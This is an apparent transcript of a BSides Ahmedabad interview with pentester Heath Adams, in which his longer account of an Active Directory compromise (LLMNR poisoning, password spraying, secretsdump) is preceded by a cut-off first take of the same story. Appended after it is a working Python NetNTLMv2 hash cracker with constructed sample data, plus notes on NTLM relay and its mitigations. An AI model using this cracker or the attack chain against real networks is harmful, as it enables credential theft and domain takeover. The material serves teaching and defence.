
BSides Ahmedabad Hacker Interviews: The Cyber Mentor (@TCMSecurityAcademy )

BSides Ahmedabad · 2023 · 14:06 · 736 views · Published 2023-02
Style: Talk
About this talk
Heath Adams's interview with BSides Ahmedabad about his most interesting hack, how he keeps up with new trends, and his advice to new hackers and bug bounty hunters. #bsidesahmedabad #infosec #bugbounty #conference #cybersecurity #pentesting #osint #reconnaissance #heathadams
Transcript [en]

Hi Heath, tell us about yourself.

Yeah, my name is Heath Adams. I am the founder and CEO of TCM Security. We are a dual-headed organization: we do cyber security consulting on one side of the organization, and on the other side of the organization we do cyber security training. So my background is in ethical hacking and YouTubing and training, so I kind of took that and put that into an organization where we have the ability to help clients and do consulting along that side, but also help students and educate students and bring in the new generation of students into cyber security.

Okay, so what made you move from an ethical hacker to a businessman?

Yeah, actually it started with my YouTube channel. So I was doing YouTube, creating content, and I was working as a penetration tester, and I started having clients come to the job I was working at and asking for me specifically, requesting me to work on the jobs, and I wasn't seeing any kickback or any benefit from that. So a light bulb went off in my head and I said, hey, I could probably go do this on my own if people are already requesting me. So I ended up quitting my job and just starting my own company, and soon enough people started coming and requesting me to do pen tests, and that's how the company took off.

Great. So what has been your most interesting hack?

Yeah, so I've had quite a few. I'll tell one that is very recent, within the last month. We were doing an internal engagement, which means that we were hacking an organization from the inside, so that assumes a breach, or somehow that you got into their network. A lot of internal engagements revolve around Active Directory, so with Active Directory there are a lot of, I call them features, quote-unquote features, but really they're vulnerabilities that ship out of the box. So if the organization's ever had a pen test before, we see a lot of these common vulnerabilities. So one of those vulnerabilities is what's called LLMNR poisoning, and that stands for Link-Local Multicast Name Resolution, and what that does is you intercept traffic in a man-in-the-middle position, and when you intercept that traffic you can respond to events and actually capture a hash of a user. If the user's hash is weak, we are able to take that offline and then crack it. We were capturing a lot of hashes in this environment, which is very standard, and we're able to go offline and crack these hashes, but the issue was that none of these hashes led anywhere. These accounts were all set up properly: there were no local administrator rights on their machines, there were no local administrator rights in the domain, they had no access to anything in the domain.

So with that, it started eliminating a lot of the attacks that we could see. There are attacks known to Active Directory such as SMB relay; we had an attack called IPv6 relay, which was not working either. So it started to allow us to really have to think outside the box. So what I did was I started looking at users and permissions that they had in the network, and I found a user that had access to all the file shares. For some reason they were overly permissive; they didn't have a reason or a right to have access to these file shares, but they did anyway. So what I was able to do is start digging around these file shares, and I found a file within a domain administrator share. That file was a...

What has been your most interesting hack?

Yeah, we've actually had quite a few, but I'll talk about one that's really recent. So last month we were working on an internal engagement, and when I say internal engagement I mean that we're working from within a network. So in that situation we assume a breach of the network, whether somebody came and dropped a laptop off or somebody compromised an employee; regardless of the situation, we're inside the network. Most networks that we do internal pen testing for, they are using what's called Active Directory. Active Directory ships with a lot of quote-unquote features that are vulnerable; they ship out of the box with these vulnerabilities, and we abuse those vulnerabilities to gain access to other machines and eventually gain access to the domain controller and compromise the domain. In this particular pen test we were doing what was called LLMNR poisoning, which is Link-Local Multicast Name Resolution, and that is a man-in-the-middle attack where we sit and respond to traffic that comes through the network. What happens is those responses generate user hashes, and we could take those hashes offline and actually try to crack them. We were getting a lot of hashes on this assessment and we were cracking a lot of hashes, which is usually really successful because we can then use that to move laterally through the network. In this situation, however, we weren't able to move anywhere, because this organization had properly set up their local administrator rights: no users were local admins, no users had access to anything, they had certain software, anti-virus and detection software, going in the network, so it was very difficult to get anywhere. What I ended up doing was starting to look for other outside-the-box ideas. I took one of the users and found that they had overly permissive access to a file share. We were able to see all the file shares; in fact, where most users were not able to see anything, this user could see everything, and this was just an accidental misconfiguration, it was just a one-time thing, and this user could access any user's file share, including domain admins'. So I started digging around, and I went into a domain admin share folder and found a document that was a setup instruction document for a Mac, an instruction guide. So this is how they would set up their MacBooks when they got them and received them brand new. Well, this document had an administrator password in it. So I grabbed the administrator password that was in there and I did what was called password spraying around the network. I just used the username of administrator and that password that I found, and I passed it along to every single computer inside the network, and one computer still was using that username and that password. With that one computer I was able to log in, and we can do what is called a secretsdump, which allows us to see any of the hashes that are stored on the computer and anything that may be running in registry, which sometimes, if we find something in registry, that is stored in clear text. In this instance a domain administrator account was running in clear text, so we were able to pull a clear text password of a domain administrator. We were able to use that then to log into the network and compromise the domain. So it went from an organization paying quite a bit of money for antivirus, for detection software, doing a lot of things right, to having one overly permissive user have access to one file share that had access to one password that worked, and that password is able to dump out an administrative password, a domain admin password, which allowed for the whole compromise. So it was a very unique chain of attacks that I hadn't seen before, but it was also very interesting because it was thinking outside the box in such a way that we'll probably never see that one directly again.

Great. So having learned about your interesting hack, the next question is somewhat linked to it: could you help us understand what you do to keep up with all the new trends?

Yeah, it's very difficult. There's new hacks coming out every day and there's new defenses coming out every day, and honestly I do a mixture of Twitter, so if you use Twitter there's some great tools that are available. Twitter actually has one called TweetDeck, which allows you to curate tweets and see certain boards, so I have tweets curated for me that are directly related to news articles and news postings from organizations that are posting zero-day exploits and the latest and greatest that's out there. The other thing is, I think community is very important. We have a Discord server for TCM Security, and people will start posting, hey, did you see this exploit that just came out, are you seeing what's happening right now, and word of mouth is one of the greatest ways to get access to up-to-date and current information. So it's a mixture of just tracking the news and curating different boards and feeds. I've seen people do RSS feeds into Discord servers or Slack servers or whatever it might be, I've seen people curate different blogs, and I've seen people just use community as well, and that's something that I really use to gain information.

Okay, any line of advice to the beginners?

Yeah, my biggest advice is to run your own race. I think that so many people are focused on what everybody else is doing, especially with social media. We are focused on the big bug bounties that are paid out, we are focused on the people that are getting all the latest and greatest certifications, and we really need to focus on ourselves. We aren't going to just pick up bug bounty hunting on day one and start becoming a fifty thousand dollar bug hunter, a hundred thousand dollar bug hunter. It takes a lot of practice and it takes a lot of failure to get there, and we don't see people post their failures most of the time; we only see the successes uploaded to the top. So what you need to worry about is making sure that you are focusing on yourself, you're taking a path that you are excited about, that gets you motivated and makes you want to wake up in the morning and to do whatever it is. If that's hacking, if that's specifically web app or network or whatever, you just want to make sure that it's something that motivates you and that you strive to improve, to get better yourself every day, and use that to motivate yourself as opposed to chasing down what others are doing. You should just be running your own race.

All right, so how do you approach a target?

For me, I do a lot of network pen testing, so a lot of that is related to external and internal pen tests. So a lot of that is what's called open source intelligence, or OSINT, and it involves a lot of digging up information about people. We want to find out: have employees of an organization been involved in any breaches? If they've been involved in any breaches, can we find any passwords related to that breach? Can we find passwords related to their personal accounts? Do those passwords work anywhere? Do we see any patterns with these passwords? What are the username structures? What are the email structures? Is the organization using a strong password policy? So it comes down to how much information can you gather, especially on the external side, because we want to know, hey, how hard is this organization going to be to hack into. When it comes to external facing assets, vulnerability scanning doesn't really go that far. So what I tell my clients is that if I find a vulnerability that's so severe that I can hack into external, generally then somebody else has probably already found it, because bots are scanning the internet all the time, 24/7. So it really comes down to what can we find about the users, what can we find about the people, and then can we dig up information to log into an email address or log into a VPN. Do we need to bypass multi-factor? Do we need to social engineer them? If we need to social engineer them, can we find information about the employees, or what systems they use, or what they like? There's a lot of different research that gets involved, but mostly what we're doing is reconnaissance on individuals and people, we're doing reconnaissance on the organization, and we're trying to find out how they can tie those in together to effectively break into an organization.

Okay, how do you balance your personal life and work?

That is a million dollar question. It's very, very difficult to do, and I feel like I don't always do it well, if I'm being candid. What I try to do is I try to make sure that I take time to spend time with my family. So what I'll do is I'll wake up early, and my wife's still asleep, I'll wake up and I will start working, so that way when she gets up I have time to spend with her in the morning, to have coffee with her, and I can chat with her and talk with her, and then I'll work until the end of the day, and then we'll spend some time together, and again we'll watch some TV, maybe watch a movie, go do something, and then I'll come back and maybe I'll put in a little bit more work. I do work a lot, but I think that there's value that you have to have in your relationships as well. You need to make time for your friends, you need to make time for your family. You can't just focus on work 24/7 or you're going to lose everybody that's around you.

All right, last but not the least, how has been your experience with BSides Ahmedabad?

It has been fantastic. I didn't know what to expect when I came out here. I made a promise last year that if I was ever invited to keynote, because I couldn't make it out last year, that I would come, and I'm so glad that I did. I've got to meet a lot of people and I have just got to experience India firsthand, and I never thought in a million years I would be able to do this. So I'm incredibly grateful to be here and I'm incredibly grateful to meet all the people of India. I legitimately felt like a celebrity, and I have been taking pictures non-stop for the last six hours, and it's been an incredible experience, because there's so many people that come up to me and just talked about how their lives have changed from our training, from courses, and how we've made it accessible to them, and so many people have told me, hey, I work in the field now, I am doing this because of you. You hear that sometimes, especially at other conferences, but I've never had that experience quite like I've seen today. I'm just getting to meet the people and see how friendly everybody is here, and the hospitality that's here, and everybody has just treated me excellent, and BSides has rolled out the red carpet, and it's been an incredible experience. I hope to come back again.

Thank you, Heath. It has been a pleasure hosting you, and we hope to see you year after year at BSides. Thank you so much.
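The "take that offline and crack it" step from the LLMNR poisoning story, in working code. This is an added example, not part of the interview and not TCM Security's tooling: it parses a Responder-style NetNTLMv2 line (`user::domain:serverchallenge:NTProofStr:blob`, the same shape hashcat mode 5600 consumes), recomputes NTProofStr for each candidate password and reports the match. The user `jsmith`, domain `CORP`, server challenge, blob and wordlist are all constructed here so it runs offline; a real line would come from Responder's logs directory. MD4 is implemented inline (assumption: no `hashlib.new("md4")`, which OpenSSL 3 builds of Python often refuse).

```python
"""NetNTLMv2 offline cracking: what happens to a hash captured by LLMNR/NBT-NS poisoning.

Added example, not from the interview. MS-NLMP:
  NThash     = MD4(UTF-16LE(password))
  NTLMv2key  = HMAC-MD5(NThash, UTF-16LE(upper(user) + domain))
  NTProofStr = HMAC-MD5(NTLMv2key, server_challenge || blob)
"""
import hmac
import struct
from hashlib import md5

MASK = 0xFFFFFFFF


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, implemented inline because hashlib may lack it (assumption)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # little-endian bit length
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        # Each step updates one register; rotating the tuple keeps the RFC's ABCD/DABC/CDAB/BCDA order.
        for i in range(16):                                          # round 1
            a, b, c, d = d, _rol((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                                          # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rol((a + G(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                                          # round 3
            a, b, c, d = d, _rol((a + H(b, c, d) + X[r3_order[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """The NT hash: what secretsdump pulls from SAM/NTDS and what pass-the-hash reuses."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr for one candidate password; the user part is upper-cased, the domain is not."""
    ntlmv2_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + blob, md5).digest()


def crack_responder_line(line: str, wordlist):
    """Parse one Responder/hashcat -m 5600 line and return the first password that reproduces NTProofStr."""
    user, _, domain, challenge_hex, proof_hex, blob_hex = line.strip().split(":")
    challenge, proof, blob = bytes.fromhex(challenge_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, challenge, blob), proof):
            return candidate
    return None


def make_capture(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Build a Responder-style line for a known password (constructed sample standing in for a real capture)."""
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample: a minimal NTLMv2 client blob (timestamp zeroed, AV pairs omitted) and a fixed challenge.
SAMPLE_BLOB = (b"\x01\x01" + b"\x00" * 6                # response type/version, reserved
               + b"\x00" * 8                            # timestamp
               + b"\xde\xad\xbe\xef\x01\x02\x03\x04"    # client challenge
               + b"\x00" * 4)                           # reserved
SAMPLE_LINE = make_capture("jsmith", "CORP", "Winter2023!", bytes.fromhex("1122334455667788"), SAMPLE_BLOB)
SAMPLE_WORDLIST = ["Password1", "Summer2023!", "Winter2023!"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_responder_line(SAMPLE_LINE, SAMPLE_WORDLIST))
```

Two practitioner notes the script makes visible. First, NTProofStr is keyed to the server challenge and the client blob, so a captured NetNTLMv2 response cannot be "passed" like an NT hash; the only offline use is guessing the password (this loop, or hashcat -m 5600 at scale), which is why the weak passwords in the story mattered and the well-configured accounts did not. Second, the live alternative is relaying the authentication instead of cracking it (the SMB relay he mentions, e.g. ntlmrelayx), which only works against targets that do not require SMB signing; signing enforcement and disabling LLMNR/NBT-NS via group policy close both paths.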